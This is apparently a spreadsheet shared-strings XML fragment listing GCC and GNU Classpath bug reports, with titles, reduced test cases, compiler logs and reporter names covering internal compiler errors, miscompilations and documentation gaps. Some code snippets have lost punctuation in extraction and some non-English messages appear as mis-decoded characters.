    <t>general operations on atomic types do not work with atomic integral typedefs</t>
  </si>
  <si>
    <t>This is rejected because the atomic operations only accept std::atomic not the std::__atomic_base base classes:
#ifdef __cplusplus
#include 
using namespace std
#else
#include 
#endif
atomic_int i
int main()
{
  atomic_store(
  return atomic_load(
}</t>
  </si>
  <si>
    <t>GCC-59450</t>
  </si>
  <si>
    <t>[OOP] ICE for type-bound-procedure expression in module procedure interface</t>
  </si>
  <si>
    <t>Hi
when I try to compile the code below I receive an internal compiler error. The idea of the test case is to have a base class with a type-bound procedure returning an array. The size of the array is determined by using a specification function with deferred binding i.e. it will be implemented in a child class / extended derived type.
When I use a component of the base class instead of the specification function the code compiles without problems.
module classes
  implicit none
  type abstract :: base_class
     integer :: varnum
   contains
     procedure(pvf_get_num) nopass deferred :: get_num
     procedure :: get_array
  end type base_class
  abstract interface
     pure function pvf_get_num() result(num)
       integer :: num
     end function pvf_get_num
  end interface
contains
  function get_array( this ) result(array)
    class(base_class) intent(in) :: this
    ! compiles
    ! integer dimension( this%varnum ) :: array
    ! crashes
    integer dimension( this%get_num() ) :: array
    array = 0
    array(1) = 1
  end function get_array
end module classes
In detail I obtain the following
Driving: gfortran -v --save-temps gcc-test2.f90 -l gfortran -l m -shared-libgcc
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/lrz/mnt/sys.x86_64/compilers/gcc/4.8.2/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.2/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.8.2/configure --prefix=/lrz/sys/compilers/gcc/4.8.2 --enable-languages=adacc++fortranjavagoobjcobj-c++ --with-mpfr=/lrz/sys/libraries/mpfr/3.0.0 --with-gmp=/lrz/sys/libraries/gmp/5.0.1 --with-mpc=/lrz/sys/libraries/mpc/0.9
Thread model: posix
gcc version 4.8.2 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /lrz/mnt/sys.x86_64/compilers/gcc/4.8.2/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.8.2/f951 gcc-test2.f90 -quiet -dumpbase gcc-test2.f90 -mtune=generic -march=x86-64 -auxbase gcc-test2 -version -fintrinsic-modules-path /lrz/mnt/sys.x86_64/compilers/gcc/4.8.2/bin/../lib/gcc/x86_64-unknown-linux-gnu/4.8.2/finclude -o gcc-test2.s
GNU Fortran (GCC) version 4.8.2 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.2 GMP version 5.0.1 MPFR version 3.0.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 4.8.2 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.8.2 GMP version 5.0.1 MPFR version 3.0.0 MPC version 0.9
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
f951: internal compiler error: Segmentation fault
0x87f55f crash_signal
        ../../gcc-4.8.2/gcc/toplev.c:332
0x55971e mio_expr
        ../../gcc-4.8.2/gcc/fortran/module.c:3300
0x559d68 mio_array_spec
        ../../gcc-4.8.2/gcc/fortran/module.c:2406
0x559e8f mio_component
        ../../gcc-4.8.2/gcc/fortran/module.c:2596
0x55a11a mio_component_list
        ../../gcc-4.8.2/gcc/fortran/module.c:2624
0x55a11a mio_symbol
        ../../gcc-4.8.2/gcc/fortran/module.c:3816
0x55a442 write_symbol
        ../../gcc-4.8.2/gcc/fortran/module.c:5090
0x55a58d write_symbol0
        ../../gcc-4.8.2/gcc/fortran/module.c:5130
0x55a535 write_symbol0
        ../../gcc-4.8.2/gcc/fortran/module.c:5109
0x55a535 write_symbol0
        ../../gcc-4.8.2/gcc/fortran/module.c:5109
0x55a535 write_symbol0
        ../../gcc-4.8.2/gcc/fortran/module.c:5109
0x55caa7 write_module
        ../../gcc-4.8.2/gcc/fortran/module.c:5396
0x55caa7 gfc_dump_module(char const* int)
        ../../gcc-4.8.2/gcc/fortran/module.c:5534
0x56844a gfc_parse_file()
        ../../gcc-4.8.2/gcc/fortran/parse.c:4623
0x5a3c05 gfc_be_parse_file
        ../../gcc-4.8.2/gcc/fortran/f95-lang.c:189
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Compiling the same source with 4.7.1 (on another system) I do not receive an ICE but instead get error reports that the specification functions wouldn't be pure
Using built-in specs.
COLLECT_GCC=gfortran-4.7.1
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --prefix /home/SOFTWARE/GCC/gcc-4.7.1 --program-suffix=-4.7.1 --enable-version-specific-runtime-libs --enable-languages=cc++fortran
Thread model: posix
gcc version 4.7.1 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-c' '-save-temps' '-mtune=generic' '-march=x86-64'
 /home/SOFTWARE/GCC/gcc-4.7.1/libexec/gcc/x86_64-unknown-linux-gnu/4.7.1/f951 gcc-test2.f90 -quiet -dumpbase gcc-test2.f90 -mtune=generic -march=x86-64 -auxbase gcc-test2 -version -fintrinsic-modules-path /home/SOFTWARE/GCC/gcc-4.7.1/lib/gcc/x86_64-unknown-linux-gnu/4.7.1/finclude -o gcc-test2.s
GNU Fortran (GCC) version 4.7.1 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.1 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU Fortran (GCC) version 4.7.1 (x86_64-unknown-linux-gnu)
        compiled by GNU C version 4.7.1 GMP version 4.3.2 MPFR version 3.0.0-p3 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
gcc-test2.f90:27.23:
    integer dimension( this%get_num() ) :: array
                       1
Error: Function 'this' at (1) must be PURE
Tanks in advance
Marcus</t>
  </si>
  <si>
    <t>GCC-10808</t>
  </si>
  <si>
    <t>3.4 irix6.5 bootstrap failure</t>
  </si>
  <si>
    <t>irix6.5 bootstrap of 3.4 cvs of 20040515 fails in stage2 with
/d5/billingd/obj/gcc/gcc/xgcc -B/d5/billingd/obj/gcc/gcc/ -B/d5/billingd/tmp/gcc/mips-sgi-irix6.5/bin/ -B/d5/billingd/tmp/gcc/mips-sgi-irix6.5/lib/ -isystem /d5/billingd/tmp/gcc/mips-sgi-irix6.5/include -isystem /d5/billingd/tmp/gcc/mips-sgi-irix6.5/sys-include -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -isystem ./include   -g  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED  -I. -I. -I/d2/billingd/src/gcc/gcc -I/d2/billingd/src/gcc/gcc/. -I/d2/billingd/src/gcc/gcc/config -I/d2/billingd/src/gcc/gcc/../include  -DL_negdi2 -c /d2/billingd/src/gcc/gcc/libgcc2.c -o libgcc/./_negdi2.o
/d2/billingd/src/gcc/gcc/libgcc2.c: In function `__negdi2':
/d2/billingd/src/gcc/gcc/libgcc2.c:72: internal compiler error: Segmentation fault
The reduced test case is
typedef int SItype __attribute__ ((mode (SI)))
typedef unsigned int USItype __attribute__ ((mode (SI)))
typedef int DItype __attribute__ ((mode (DI)))
struct DWstruct {SItype high low}
typedef union
{
  struct DWstruct s
  DItype ll
} DWunion
DItype
__negdi2 (DItype u)
{
  DWunion w
  DWunion uu
  uu.ll = u
  w.s.low = -uu.s.low
  w.s.high = -uu.s.high - ((USItype) w.s.low &gt; 0)
  return w.ll
}
which fails with
/d5/billingd/obj/gcc/gcc/cc1 -fpreprocessed libgcc2.i -quiet -dumpbase libgcc2.c -auxbase-strip libgcc/./_negdi2.o -g -O2 -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -version -o libgcc2.s
GNU C version 3.4 20030515 (experimental) (mips-sgi-irix6.5)
        compiled by GNU C version 3.4 20030515 (experimental).
GGC heuristics: --param ggc-min-expand=65 --param ggc-min-heapsize=65536
libgcc2.i:15: warning: no previous prototype for `__negdi2'
libgcc2.i: In function `__negdi2':
libgcc2.i:22: internal compiler error: Segmentation fault
Release:
3.4 20030515 (experimental)
Environment:
mips-sgi-irix6.5</t>
  </si>
  <si>
    <t>GCC-8622</t>
  </si>
  <si>
    <t>typename of base class</t>
  </si>
  <si>
    <t>A type definition defined by a template typename in a base class is not understood in the derived class.
This work with Visual 7 or Intel Compiler 6 but gcc gives the following unjustified warnings:
warnings: 'typename B::value_type' is implicitly a typename
warnings: implicit typename is deprecated please see the documentation for details
Am I wrong ?
If it is really a bug please correct it because it is quite important for my big project.
Patrick
Release:
gcc3.2
Environment:
cygwin probably every other
How-To-Repeat:
template
struct value_traits
{
  typedef V value_type
}
template
struct A
{
  typedef typename value_traits::value_type value_type
}
template
struct B : public A
{
  value_type v
}
int main()
{
  B b
  return 0
}</t>
  </si>
  <si>
    <t>GCC-51218</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Potential optimization bug due to implicit_pure?</t>
  </si>
  <si>
    <t>Hi all
the attached code crashes at runtime with gfortran 4.7
(svn rev. 181390) when compiled with optimization (-O1 and higher).
It works when compiled with -O0 with gfortran 4.6 and earlier
at any optimization level tested and a series of other compilers.
Can anybody shed some light on this problem?
Depending on the active line in the main program
!####################################
! Either expression leads to a crash:
  u  = sum(xi*wi) + sum(xi*wi)
! u  = sum(xi*wi  +     xi*wi)
!####################################
I get a backtrace or a
*** glibc detected *** ./a.out: double free or corruption (fasttop): 0x080743a0 *
Activating the following print
!#######################################
!print * vector_times_vector: barrier
!#######################################
in module mo_dec_matrix makes the crash disappear.
Thanks
Harald</t>
  </si>
  <si>
    <t>GCC-38978</t>
  </si>
  <si>
    <t>[4.4 Regression]  g++.dg/torture/pr36191.C</t>
  </si>
  <si>
    <t>On Linux/ia32 revision 143673 gave:
FAIL: g++.dg/torture/pr36191.C  -O2  (internal compiler error)
FAIL: g++.dg/torture/pr36191.C  -O2  (test for excess errors)
FAIL: g++.dg/torture/pr36191.C  -O3 -fomit-frame-pointer  (internal compiler error)
FAIL: g++.dg/torture/pr36191.C  -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: g++.dg/torture/pr36191.C  -O3 -g  (internal compiler error)
FAIL: g++.dg/torture/pr36191.C  -O3 -g  (test for excess errors)
Revision 143664 is OK. It is caused by either revision 143672:
http://gcc.gnu.org/ml/gcc-cvs/2009-01/msg00685.html
or revision 143673:
http://gcc.gnu.org/ml/gcc-cvs/2009-01/msg00686.html</t>
  </si>
  <si>
    <t>GCC-2619</t>
  </si>
  <si>
    <t>Link fail with seekpos symbol</t>
  </si>
  <si>
    <t>When compiling the following program:
#include 
using namespace std
int main ()
{
   int val
   istringstream str_vector(string(10))
   str_vector &gt;&gt; val
}
I get a link error:
/home/jm/tmp/ccJSFtbS.o(.gnu.linkonce.d._ZTVSt15basic_stringbufIcSt11char_traitsIcESaIcEE+0x1c): undefined reference to `std::basic_stringbuf std::allocator &gt;::seekpos(std::fpos std::_Ios_Openmode)'
collect2: ld returned 1 exit status
Release:
gcc version 3.0 20010423 (prerelease) (RPM download)
Environment:
Mandrake 8.0 (fresh install)
How-To-Repeat:
Any file that uses the stringstream class won't link.</t>
  </si>
  <si>
    <t>valj01</t>
  </si>
  <si>
    <t>GCC-6834</t>
  </si>
  <si>
    <t>gcc 3.1 wrongly compiles some GNUstep code</t>
  </si>
  <si>
    <t>This is the code to swap bytes in a 2-byte integer existing
in GNUstep. The generated code converts 0x0456 into 0x0408
instead of 0x5604. The same file renamed from y.m to y.c
generates good code. This used to work in gcc 3.0.4.
Without -O2 the code compiles OK.
Compiler output:
bash-2.05a$ gcc -v -save-temps -O2 y.m
Reading specs from /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: /var/tmp/portage/gcc-3.1-r2/work/gcc-3.1/configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --datadir=/usr/share/gcc-3.1 --enable-shared --host=i686-pc-linux-gnu --build=i686-pc-linux-gnu --target=i686-pc-linux-gnu --enable-threads=posix --disable-checking --with-local-prefix=/usr/local --with-system-zlib --enable-shared --enable-nls --without-included-gettext
Thread model: posix
gcc version 3.1
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-objc -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ y.m y.mi
GNU CPP version 3.1 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/include
End of search list.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1obj -fpreprocessed y.mi -quiet -dumpbase y.m -O2 -version -o y.s
GNU CPP version 3.1 (cpplib) (i386 Linux/ELF)
GNU Objective-C version 3.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.1.
 /usr/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o y.o y.s
GNU assembler version 2.11.92.0.12.3 (i686-pc-linux-gnu) using BFD version 2.11.92.0.12.3 20011121
bash-2.05a$
Release:
gcc version 3.1
Environment:
Linux (gentoo 1a 2.4.18) Pentium III
How-To-Repeat:
gcc -O2 y.mi
./a.out
prints 456 408 (0x456 is input and 0x408 is output to the function)
mv y.mi y.i
gcc -O2 y.i
./a.out
prints 456 5604  (the correct output)</t>
  </si>
  <si>
    <t>benhur</t>
  </si>
  <si>
    <t>GCC-31477</t>
  </si>
  <si>
    <t>[libgcc] miscompiled trapping arithmetic routines</t>
  </si>
  <si>
    <t>At least some of the trapping arithmetic routines (__absvsi2 etc) are
being compiled *without* the abort that would in general be required.
These routines are falling foul of the signed-arithmetic-doesn't-overflow
coding trap.  We need to either compile them with -fwrapv or rewrite 
them to use unsigned arithmetic.
Further it would be A Good Idea if these routines were actually tested...</t>
  </si>
  <si>
    <t>GCC-71764</t>
  </si>
  <si>
    <t>[4.9/5/6/7 Regression] ICE in gfc_trans_structure_assign</t>
  </si>
  <si>
    <t>Created attachment 38832
libfsqlite-full
I am wrapping the libsqlite3-dev for Fortran.
gfortran fsqlite_runtime.f08 -o fsqlite_runtime.o -fopenmp -Warray-bounds -Wall -Wextra -fno-strict-aliasing -fwrapv -g -std=f2008ts -c
fsqlite_runtime.f08:103:0:
                 c_err = sqlite3_exec_ex(db sqls to_cb to_dat c_null_ptr)
 1
ç¼–è¯‘å™¨å†…éƒ¨é”™è¯¯: Segmentation fault
è¯·æäº¤ä¸€ä»½å®Œæ•´çš„é”™è¯¯æŠ¥å‘Šï¼Œ
å¦‚æœ‰å¯èƒ½è¯·é™„ä¸Šç»é¢„å¤„ç†åŽçš„æºæ–‡ä»¶ã€‚
å‚é˜…  ä»¥èŽ·å–æŒ‡ç¤ºã€‚
make: *** [Makefile:56ï¼šfsqlite_runtime.o] é”™è¯¯ 1
fsqlite_runtime.f08:129:0:
                 c_err = sqlite3_prepare_ex(db sql c_strlen(c_loc(sql)) stmt c_null_ptr)
 1
ç¼–è¯‘å™¨å†…éƒ¨é”™è¯¯: Segmentation fault
è¯·æäº¤ä¸€ä»½å®Œæ•´çš„é”™è¯¯æŠ¥å‘Šï¼Œ
å¦‚æœ‰å¯èƒ½è¯·é™„ä¸Šç»é¢„å¤„ç†åŽçš„æºæ–‡ä»¶ã€‚
å‚é˜…  ä»¥èŽ·å–æŒ‡ç¤ºã€‚
make: *** [Makefile:56ï¼šfsqlite_runtime.o] é”™è¯¯ 1
If I place the relevant code to a single file and compile it it will be successlly compiled.</t>
  </si>
  <si>
    <t>heresy-me</t>
  </si>
  <si>
    <t>GCC-2745</t>
  </si>
  <si>
    <t>Recompiles after successful 'gmake' when 'gmake install' is tried</t>
  </si>
  <si>
    <t>The following was attempted:
&gt; ./configure
&gt; gmake
&gt; gmake install
When gmake-ing libgcj everything went fine and gmake
was successful.
However when 'gmake install' command was issued gmake
started recompiling almost everything probably from the
scratch.
Release:
2.95.1
Environment:
alpha-dec-osf4.0b
GNU make
GCC 2.95.3
/usr/bin/as
/usr/bin/ld
shared libstdc++.so erased because of 'Multiple defined
symbol' bug
How-To-Repeat:
gzip -cd libgcj-2.95.1 | tar xvf -
mkdir libgcj
cd libgcj
../libgcj-2.95.1/configure
gmake
gmake install</t>
  </si>
  <si>
    <t>GCC-59257</t>
  </si>
  <si>
    <t>usan/*san: Dpcumentation oddness of -fsanitize= / -fsanitize=shift</t>
  </si>
  <si>
    <t>Regarding -fsanitize=*
That option does not appear in http://gcc.gnu.org/onlinedocs/gcc/Option-Index.html but I think it should. 
Actually I think several other options miss a @opindex entry too.
Additionally in the man page I get:
       -fsanitize=undefined
           Enable UndefinedBehaviorSanitizer a fast undefined
           behavior detector.  Various computations will be
           instrumented to detect undefined behavior at runtime.
           Current suboptions are:
           *
               This option enables checking that the result of a
The  look odd.
In invoke.texi one has:
@item -fsanitize=undefined
...
  @item @option{-fsanitize=shift}
Maybe there shouldn't be an @option{}?
It does look okay at http://gcc.gnu.org/onlinedocs/gcc/Debugging-Options.html</t>
  </si>
  <si>
    <t>CLASSPATH-26888</t>
  </si>
  <si>
    <t>JTextArea/PlainDocument - removing text with line-breaks makes component unusable</t>
  </si>
  <si>
    <t>Enter the following text into a JTextArea (without quotes):
abc
def
Move before the a and delete all characters by pressing the delete key. If you press a key now nothing will happen eg. no text is put into the textarea. Pasting while having a text in the clipboard does not work either.
Explicitly setting a text with jTextAreaInstance.setText(foo) does not work too.
Getting the underlying PlainDocument and running insertString(0 foo null) has no effect too.</t>
  </si>
  <si>
    <t>GCC-7094</t>
  </si>
  <si>
    <t>initialized static const value in class disappears sometimes</t>
  </si>
  <si>
    <t>The attached code (gcc31bug2.cc) refers to an
initialized static const value in a class.  The
linker claims that this value is undefined.
This compiles fine under gcc-2.95.3.
Command:
    g++ gcc31bug2.cc
Output:
/tmp/cc2E65Pk.o: In function `main':
/tmp/cc2E65Pk.o(.text+0x13): undefined reference to `C::VALUE'
collect2: ld returned 1 exit status
Release:
3.1
Environment:
Reading specs from /tools/gcc/3.1/i686-2.4.7-10/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc-3.1/configure --prefix=/tools/gcc/3.1 --exec-prefix=/tools/gcc/3.1/i686-2.4.7-10 --disable-nls --enable-shared
How-To-Repeat:
Compile the following:
struct C
{
    static const int VALUE = 1
}
template
void func(const T &amp;val)
{
}
main()
{
    func(C::VALUE)
}</t>
  </si>
  <si>
    <t>dmonksfd</t>
  </si>
  <si>
    <t>GCC-79925</t>
  </si>
  <si>
    <t>aarch64: misplaced quote in diagnostic</t>
  </si>
  <si>
    <t>from config/aarch64/aarch64.c:
	error (invalid feature modifier in -mcpu=%qs str)
The quotes should be around Â»-mcpu=given-valueÂ« not around -mcpu=Â»given-valueÂ«.</t>
  </si>
  <si>
    <t>GCC-62121</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: Segmentation fault in ipa-devirt.c:997</t>
  </si>
  <si>
    <t>Created attachment 33311
preprocessed file
I got the internal compiler error: Segmentation fault when trying to compile a piece of software.
I did my best with reducing the size of the preprocessed file.
This is the call I used:
[jure@liana Simulation]$ g++ -v -save-temps -O2 -g -Wall -Wno-write-strings -fno-strict-aliasing -I/usr/local/src/Cola/Simulation -I/usr/local/src/Cola -c /usr/local/src/Cola/Simulation/Generate.cc -o Generate.o
Using built-in specs.
COLLECT_GCC=g++
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc/src/gcc-4.9.1/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-cloog-backend=isl --disable-isl-version-check --disable-cloog-version-check --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --disable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 4.9.1 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O2' '-g' '-Wall' '-Wno-write-strings' '-fno-strict-aliasing' '-I' '/usr/local/src/Cola/Simulation' '-I' '/usr/local/src/Cola' '-c' '-o' 'Generate.o' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/cc1plus -E -quiet -v -I /usr/local/src/Cola/Simulation -I /usr/local/src/Cola -D_GNU_SOURCE /usr/local/src/Cola/Simulation/Generate.cc -mtune=generic -march=x86-64 -Wall -Wno-write-strings -fno-strict-aliasing -g -fworking-directory -O2 -fpch-preprocess -o Generate.ii
ignoring nonexistent directory /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/../../../../x86_64-unknown-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/src/Cola/Simulation
 /usr/local/src/Cola
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/../../../../include/c++/4.9.1
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/../../../../include/c++/4.9.1/x86_64-unknown-linux-gnu
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/../../../../include/c++/4.9.1/backward
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/include
 /usr/local/include
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-O2' '-g' '-Wall' '-Wno-write-strings' '-fno-strict-aliasing' '-I' '/usr/local/src/Cola/Simulation' '-I' '/usr/local/src/Cola' '-c' '-o' 'Generate.o' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/gcc/x86_64-unknown-linux-gnu/4.9.1/cc1plus -fpreprocessed Generate.ii -quiet -dumpbase Generate.cc -mtune=generic -march=x86-64 -auxbase-strip Generate.o -g -O2 -Wall -Wno-write-strings -version -fno-strict-aliasing -o Generate.s
GNU C++ (GCC) version 4.9.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.9.1 GMP version 6.0.0 MPFR version 3.1.2-p10 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.9.1 (x86_64-unknown-linux-gnu)
	compiled by GNU C version 4.9.1 GMP version 6.0.0 MPFR version 3.1.2-p10 MPC version 1.0.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: fdbc1ab4b95871335b3cdc1df328ea62
/usr/local/src/Cola/Simulation/Generate.cc: In member function â€˜virtual double generateBremsstrahlung::generateEvent(double)â€™:
/usr/local/src/Cola/Simulation/Generate.cc:18:12: warning: unused variable â€˜randomâ€™ [-Wunused-variable]
     double random = halton[2]()
            ^
/usr/local/src/Cola/Simulation/Generate.cc:18:31: internal compiler error: Segmentation fault
     double random = halton[2]()
                               ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>berisc</t>
  </si>
  <si>
    <t>GCC-33303</t>
  </si>
  <si>
    <t>Document __GFORTRAN__</t>
  </si>
  <si>
    <t>I think __GFORTRAN__ is undocumented - at least I could not find any .texi where it is documented.
I think it should be documented in doc/cpp.texi possibly also in fortran/*texi.</t>
  </si>
  <si>
    <t>GCC-8485</t>
  </si>
  <si>
    <t>g77 doesn't accept INTEGER*8 constant in PARAMETER multiplication</t>
  </si>
  <si>
    <t>g77 rejects the following which uses a supported extension
(namely 64-bit INTEGERs):
      PARAMETER (PPMULT = 1.0E5)
      INTEGER*8 NWRONG
      PARAMETER (NWRONG = 8)
      PARAMETER (DDMULT = PPMULT * NWRONG)
      END
      PARAMETER (DDMULT = PPMULT * NWRONG)
                          ^
Expression at (^) has incorrect data type or rank for
its context
Release:
3.2
Environment:
Linux (doesn't seem to be really relevant.
How-To-Repeat:
Compile the above just using g77 file.f</t>
  </si>
  <si>
    <t>pmarguinaud</t>
  </si>
  <si>
    <t>GCC-57839</t>
  </si>
  <si>
    <t>Reallocate on assignment does not work properly</t>
  </si>
  <si>
    <t>The following program does not produce the expected results with either gfortran 4.8 or gfortran 4.9:
program test_lhs_allocate
    use iso_fortran_env
    implicit none
    type :: table
        character(63) :: name = ''
        character(63) allocatable :: alias(:)
    end type
    integer :: i j
    type(table) allocatable :: list(:)
    type(table) :: item
    allocate (list(1:0))    !empty list
    item%name = 'name'
    item%alias = [character(63) :: 'label']
    list = [list item]
    item%name = 'id'
    item%alias = [character(63) :: ]
    list = [list item]
    item%name = 'status'
    item%alias = [character(63) :: 'state' 'validity' 'test']
    list = [list item]
    !item%name = 'other'
    !item%alias = [character(63) :: 'extra' 'additional' 'more']
    !list = [list item]
    do i = 1 SIZE(list)
        write (OUTPUT_UNIT '(/name:  A/aliases:  *(A:))') &amp;
            TRIM(list(i)%name) &amp;
            (TRIM(list(i)%alias(j)) j = 1 SIZE(list(i)%alias))
    enddo
end program test_lhs_allocate
The actual output is:
...:~$ gfortran-4.9 -std=f2008 test_lhs_allocate.f90 
...:~$ ./a.out 
name: name
aliases: ï¿½ï¿½ï¿½
name: id
aliases: 
name: status
aliases: statevaliditytest
What is expected:
name: name
aliases: label
name: id
aliases: 
name: status
aliases: statevalidity
If I enable the three commented lines then the output is:
...:~$ gfortran-4.9 -std=f2008 test_lhs_allocate.f90 
...:~$ ./a.out 
name: name
aliases: ï¿½ï¿½ï¿½
name: id
aliases: 
name: status
aliases: nameï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½id                                                 ï¿½ï¿½ï¿½ï¿½ï¿½
name: other
aliases: extraadditionalmore
It seems as if every time an item is added to the list all the aliases in the previous items are lost.
The system information is:
...:~$ ll `which gfortran-4.9` &amp;&amp; /usr/lib/gcc-snapshot/bin/gfortran -v &amp;&amp; apt-cache policy gfortran-4.8 gcc-snapshot &amp;&amp; lsb_release -rd
lrwxrwxrwx 1 root staff 34 Jul  5 12:58 /usr/local/bin/gfortran-4.9 -&gt; /usr/lib/gcc-snapshot/bin/gfortran*
Using built-in specs.
COLLECT_GCC=/usr/lib/gcc-snapshot/bin/gfortran
COLLECT_LTO_WRAPPER=/usr/lib/gcc-snapshot/libexec/gcc/x86_64-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 20130620-1' --with-bugurl=file:///usr/share/doc/gcc-snapshot/README.Bugs --enable-languages=cadac++javagofortranobjcobj-c++ --prefix=/usr/lib/gcc-snapshot --enable-shared --enable-linker-build-id --disable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-snap-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-snap-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --disable-werror --enable-checking=yes --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.0 20130620 (experimental) [trunk revision 200244] (Debian 20130620-1) 
gfortran-4.8:
  Installed: 4.8.1-5
  Candidate: 4.8.1-5
  Version table:
 *** 4.8.1-5 0
        200 http://ftp.us.debian.org/debian/ unstable/main amd64 Packages
        100 /var/lib/dpkg/status
     4.8.1-2 0
        500 http://ftp.us.debian.org/debian/ testing/main amd64 Packages
gcc-snapshot:
  Installed: 20130620-1
  Candidate: 20130620-1
  Version table:
 *** 20130620-1 0
        200 http://ftp.us.debian.org/debian/ unstable/main amd64 Packages
        100 /var/lib/dpkg/status
Description:	Debian GNU/Linux testing (jessie)
Release:	testing</t>
  </si>
  <si>
    <t>jwmwalrus</t>
  </si>
  <si>
